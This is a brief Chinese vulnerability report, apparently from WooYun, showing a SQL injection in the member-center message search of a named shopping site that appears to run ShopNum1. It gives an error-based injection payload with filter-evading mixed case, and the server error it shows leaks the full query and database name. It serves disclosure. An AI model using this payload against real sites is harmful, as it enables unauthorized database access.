WooYun.org

前提必须要注册账号
以 http://www.dapeng.net/ 为例子  
我事先注册一个账号  然后在会员中心的地方 输入（如图所示吧）
' anD quotename(db_name())>0 aNd 's' lIke 's



再点击查询  
【 友情提示 】
很抱歉，您要访问的页面无法正确显示，可能是因为如下原因：
1 . 系统过于繁忙，请点击浏览器的“刷新”按钮，或稍后再试。
2 . 您输入的网址有误，请重新检查您输入的网址。 
3 . 此页面已经删除，请访问其他页面。 
4 . 此页遭到非法访问，被程序自动屏蔽。 
SELECT b.Title,b.[Type],b.[Content],b.CreateTime,a.* FROM ShopNum1_AgentMemberMessage AS a,ShopNum1_AgentMessageInfo AS b WHERE a.MessageInfoGuid = b.Guid AND SendIsDeleted = 0 AND SendMemLoginID = '200200' AND Title LIKE '%' anD quotename(db_name())>0 aNd 's' lIke 's%' ORDER BY b.CreateTime DESC_在将 nvarchar 值 '[dapeng]' 转换成数据类型 int 时失败。
我之前提交的案例 几乎都有这方面的问题